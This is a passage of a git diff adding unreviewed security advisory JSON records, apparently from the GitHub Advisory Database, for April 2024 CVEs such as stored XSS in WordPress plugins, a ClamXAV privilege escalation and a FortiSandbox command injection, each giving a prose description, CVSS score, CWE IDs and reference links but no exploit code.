sensitive information via inadequate security measures implemented within the logging mechanisms of ROS2.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30684" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30684" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T05:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4w89-wf2p-r2rr/GHSA-4w89-wf2p-r2rr.json b/advisories/unreviewed/2024/04/GHSA-4w89-wf2p-r2rr/GHSA-4w89-wf2p-r2rr.json new file mode 100644 index 00000000000..c746a0acf53 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4w89-wf2p-r2rr/GHSA-4w89-wf2p-r2rr.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4w89-wf2p-r2rr", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-24245" + ], + "details": "An issue in Canimaan Software LTD ClamXAV v3.1.2 through v3.6.1 and fixed in v.3.6.2 allows a local attacker to escalate privileges via the ClamXAV helper tool component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24245" + }, + { + "type": "WEB", + "url": "https://www.clamxav.com/version-history" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4wc6-f79m-2qgj/GHSA-4wc6-f79m-2qgj.json b/advisories/unreviewed/2024/04/GHSA-4wc6-f79m-2qgj/GHSA-4wc6-f79m-2qgj.json new file mode 100644 index 00000000000..8c3652da1bb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4wc6-f79m-2qgj/GHSA-4wc6-f79m-2qgj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4wc6-f79m-2qgj", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2181" + ], + "details": "The Beaver Builder Addons by WPZOOM plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Button widget in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2181" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3046905/wpzoom-addons-for-beaver-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6baa44c7-1c13-45ad-9fb5-da06933f3cd0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4wcf-973m-cwfg/GHSA-4wcf-973m-cwfg.json b/advisories/unreviewed/2024/04/GHSA-4wcf-973m-cwfg/GHSA-4wcf-973m-cwfg.json new file mode 100644 index 00000000000..caa3a0b8e2f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4wcf-973m-cwfg/GHSA-4wcf-973m-cwfg.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4wcf-973m-cwfg", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2492" + ], + "details": "The PowerPack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Twitter Tweet widget in all versions up to, and including, 2.7.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2492" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3059841/powerpack-lite-for-elementor" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/11386b6a-632c-451a-b726-846f74b6f42d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4x8g-r685-hg4j/GHSA-4x8g-r685-hg4j.json b/advisories/unreviewed/2024/04/GHSA-4x8g-r685-hg4j/GHSA-4x8g-r685-hg4j.json new file mode 100644 index 00000000000..5c240db3537 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4x8g-r685-hg4j/GHSA-4x8g-r685-hg4j.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4x8g-r685-hg4j", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2287" + ], + "details": "The Knight Lab Timeline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.9.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2287" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/knight-lab-timelinejs/tags/3.9.3.3&old=3051910&new_path=/knight-lab-timelinejs/tags/3.9.3.4&new=3051910&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/afb3e68e-6f79-4c46-b41e-8fd6eb43c755?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4x96-36w6-qf79/GHSA-4x96-36w6-qf79.json b/advisories/unreviewed/2024/04/GHSA-4x96-36w6-qf79/GHSA-4x96-36w6-qf79.json new file mode 100644 index 00000000000..88e5a4add8a --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4x96-36w6-qf79/GHSA-4x96-36w6-qf79.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4x96-36w6-qf79", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2117" + ], + "details": "The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Path Widget in all versions up to, and including, 3.20.2 due to insufficient output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2117" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058940%40elementor&new=3058940%40elementor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c8d7448a-b8a6-4b0b-92df-a15272fc56bf?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4xc2-wqm4-hxjx/GHSA-4xc2-wqm4-hxjx.json b/advisories/unreviewed/2024/04/GHSA-4xc2-wqm4-hxjx/GHSA-4xc2-wqm4-hxjx.json new file mode 100644 index 00000000000..6d4f79d8e80 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4xc2-wqm4-hxjx/GHSA-4xc2-wqm4-hxjx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4xc2-wqm4-hxjx", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-27665" + ], + "details": "Unifiedtransform v2.X is vulnerable to Stored Cross-Site Scripting (XSS) via file upload feature in Syllabus module.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27665" + }, + { + "type": "WEB", + "url": "https://github.com/Thirukrishnan/CVE-2024-27665" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T20:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-4xx7-g4qj-7pxm/GHSA-4xx7-g4qj-7pxm.json b/advisories/unreviewed/2024/04/GHSA-4xx7-g4qj-7pxm/GHSA-4xx7-g4qj-7pxm.json new file mode 100644 index 00000000000..1db4d6eac47 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-4xx7-g4qj-7pxm/GHSA-4xx7-g4qj-7pxm.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4xx7-g4qj-7pxm", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-3542" + ], + "details": "A vulnerability classified as problematic was found in Campcodes Church Management System 1.0. This vulnerability affects unknown code of the file /admin/add_visitor.php. The manipulation of the argument mobile leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259912.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3542" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Church%20Management%20System/Church%20Management%20System%20-%20vuln%209.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259912" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259912" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312544" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T06:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-52qx-x9h4-rv8r/GHSA-52qx-x9h4-rv8r.json b/advisories/unreviewed/2024/04/GHSA-52qx-x9h4-rv8r/GHSA-52qx-x9h4-rv8r.json new file mode 100644 index 00000000000..0824154d3d7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-52qx-x9h4-rv8r/GHSA-52qx-x9h4-rv8r.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-52qx-x9h4-rv8r", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2024-27896" + ], + "details": "Input verification vulnerability in the log module.\nImpact: Successful exploitation of this vulnerability can affect integrity.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27896" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/3" + }, + { + "type": "WEB", + "url": "https://https://device.harmonyos.com/en/docs/security/update/security-bulletins-202403-0000001667644725" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-53gv-p4jm-h5xv/GHSA-53gv-p4jm-h5xv.json b/advisories/unreviewed/2024/04/GHSA-53gv-p4jm-h5xv/GHSA-53gv-p4jm-h5xv.json new file mode 100644 index 00000000000..1411855441f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-53gv-p4jm-h5xv/GHSA-53gv-p4jm-h5xv.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-53gv-p4jm-h5xv", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2734" + ], + "details": "The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's AI features all versions up to, and including, 4.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2734" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3064413%40bold-page-builder&new=3064413%40bold-page-builder&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/650b5677-7c70-415f-81bf-12514393e4c9?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-53j3-7gcw-5jmc/GHSA-53j3-7gcw-5jmc.json b/advisories/unreviewed/2024/04/GHSA-53j3-7gcw-5jmc/GHSA-53j3-7gcw-5jmc.json new file mode 100644 index 00000000000..6dee2b607b8 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-53j3-7gcw-5jmc/GHSA-53j3-7gcw-5jmc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-53j3-7gcw-5jmc", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-26179" + ], + "details": "Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26179" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26179" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-53x2-fcg3-m32m/GHSA-53x2-fcg3-m32m.json b/advisories/unreviewed/2024/04/GHSA-53x2-fcg3-m32m/GHSA-53x2-fcg3-m32m.json index cbfd755ece4..7431cf8f480 100644 --- a/advisories/unreviewed/2024/04/GHSA-53x2-fcg3-m32m/GHSA-53x2-fcg3-m32m.json +++ b/advisories/unreviewed/2024/04/GHSA-53x2-fcg3-m32m/GHSA-53x2-fcg3-m32m.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-89" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/04/GHSA-54gx-9g28-h45h/GHSA-54gx-9g28-h45h.json b/advisories/unreviewed/2024/04/GHSA-54gx-9g28-h45h/GHSA-54gx-9g28-h45h.json new file mode 100644 index 00000000000..a6334cf06f9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-54gx-9g28-h45h/GHSA-54gx-9g28-h45h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54gx-9g28-h45h", + "modified": "2024-04-05T18:30:35Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2024-22004" + ], + "details": "Due to length check, an attacker with privilege access on a Linux Nonsecure operating system can trigger a vulnerability and leak the secure memory from the Trusted Application\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22004" + }, + { + "type": "WEB", + "url": "https://support.google.com/product-documentation/answer/14580222?hl=en&ref_topic=12974021&sjid=10751611047462550096-NA" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-556c-jfj4-29vc/GHSA-556c-jfj4-29vc.json b/advisories/unreviewed/2024/04/GHSA-556c-jfj4-29vc/GHSA-556c-jfj4-29vc.json new file mode 100644 index 00000000000..c3101727b61 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-556c-jfj4-29vc/GHSA-556c-jfj4-29vc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-556c-jfj4-29vc", + "modified": "2024-04-09T03:30:52Z", + "published": "2024-04-09T03:30:52Z", + "aliases": [ + "CVE-2024-27899" + ], + "details": "Self-Registration and Modify your own profile in User Admin Application of NetWeaver AS Java does not enforce proper security requirements for the content of the newly defined security answer. This can be leveraged by an attacker to cause profound impact on confidentiality and low impact on both integrity and availability.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27899" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3434839" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-640" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-55w9-hrch-c3j9/GHSA-55w9-hrch-c3j9.json b/advisories/unreviewed/2024/04/GHSA-55w9-hrch-c3j9/GHSA-55w9-hrch-c3j9.json new file mode 100644 index 00000000000..f7d17f36465 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-55w9-hrch-c3j9/GHSA-55w9-hrch-c3j9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55w9-hrch-c3j9", + "modified": "2024-04-05T21:32:44Z", + "published": "2024-04-05T21:32:44Z", + "aliases": [ + "CVE-2024-29756" + ], + "details": "In afe_callback of q6afe.c, there is a possible out of bounds write due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29756" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-55x4-qvh8-76c6/GHSA-55x4-qvh8-76c6.json b/advisories/unreviewed/2024/04/GHSA-55x4-qvh8-76c6/GHSA-55x4-qvh8-76c6.json new file mode 100644 index 00000000000..0762832cc8e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-55x4-qvh8-76c6/GHSA-55x4-qvh8-76c6.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55x4-qvh8-76c6", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-3244" + ], + "details": "The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's \n'embedpress_calendar' shortcode in all versions up to, and including, 3.9.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3244" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.13/EmbedPress/ThirdParty/Googlecalendar/Embedpress_Google_Helper.php#L657" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3064544/embedpress/tags/3.9.15/EmbedPress/ThirdParty/Googlecalendar/Embedpress_Google_Helper.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/778d8443-fc0f-4e97-8460-e5ceee8b62a1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5634-373h-23fw/GHSA-5634-373h-23fw.json b/advisories/unreviewed/2024/04/GHSA-5634-373h-23fw/GHSA-5634-373h-23fw.json new file mode 100644 index 00000000000..b58260cdb99 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5634-373h-23fw/GHSA-5634-373h-23fw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5634-373h-23fw", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2347" + ], + "details": "The Astra theme for WordPress is vulnerable to Stored Cross-Site Scripting via a user's display name in all versions up to, and including, 4.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2347" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/changeset/221725/astra" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ed914e67-4cf7-49b1-96be-ed8c604e6dce?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-564x-rr7c-f7qq/GHSA-564x-rr7c-f7qq.json b/advisories/unreviewed/2024/04/GHSA-564x-rr7c-f7qq/GHSA-564x-rr7c-f7qq.json new file mode 100644 index 00000000000..a442efc2694 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-564x-rr7c-f7qq/GHSA-564x-rr7c-f7qq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-564x-rr7c-f7qq", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-47540" + ], + "details": "An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSandbox version 4.4.0 through 4.4.2 and 4.2.0 through 4.2.6 and 4.0.0 through 4.0.5 and 3.2.0 through 3.2.4 and 3.0.5 through 3.0.7 may allows attacker to execute unauthorized code or commands via CLI.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47540" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-411" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-56vm-qxhc-5p2f/GHSA-56vm-qxhc-5p2f.json b/advisories/unreviewed/2024/04/GHSA-56vm-qxhc-5p2f/GHSA-56vm-qxhc-5p2f.json new file mode 100644 index 00000000000..43cd5ab62b7 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-56vm-qxhc-5p2f/GHSA-56vm-qxhc-5p2f.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-56vm-qxhc-5p2f", + "modified": "2024-04-07T21:30:28Z", + "published": "2024-04-07T21:30:28Z", + "aliases": [ + "CVE-2024-31948" + ], + "details": "In FRRouting (FRR) through 9.1, an attacker using a malformed Prefix SID attribute in a BGP UPDATE packet can cause the bgpd daemon to crash.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31948" + }, + { + "type": "WEB", + "url": "https://github.com/FRRouting/frr/pull/15628" + }, + { + "type": "WEB", + "url": "https://github.com/FRRouting/frr/pull/15628/commits/ba6a8f1a31e1a88df2de69ea46068e8bd9b97138" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T21:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-574q-w5vp-7fm6/GHSA-574q-w5vp-7fm6.json b/advisories/unreviewed/2024/04/GHSA-574q-w5vp-7fm6/GHSA-574q-w5vp-7fm6.json new file mode 100644 index 00000000000..e40f9ec4afb --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-574q-w5vp-7fm6/GHSA-574q-w5vp-7fm6.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-574q-w5vp-7fm6", + "modified": "2024-04-06T12:30:56Z", + "published": "2024-04-06T12:30:56Z", + "aliases": [ + "CVE-2024-3376" + ], + "details": "A vulnerability classified as critical has been found in SourceCodester Computer Laboratory Management System 1.0. This affects an unknown part of the file config.php. The manipulation of the argument url leads to execution after redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259497 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3376" + }, + { + "type": "WEB", + "url": "https://github.com/Sospiro014/zday1/blob/main/Execution_After_Redirect.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259497" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259497" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311154" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-698" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-5853-h8ff-m754/GHSA-5853-h8ff-m754.json b/advisories/unreviewed/2024/04/GHSA-5853-h8ff-m754/GHSA-5853-h8ff-m754.json new file mode 100644 index 00000000000..57095ec0d10 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-5853-h8ff-m754/GHSA-5853-h8ff-m754.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5853-h8ff-m754", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2033" + ], + "details": "The Video 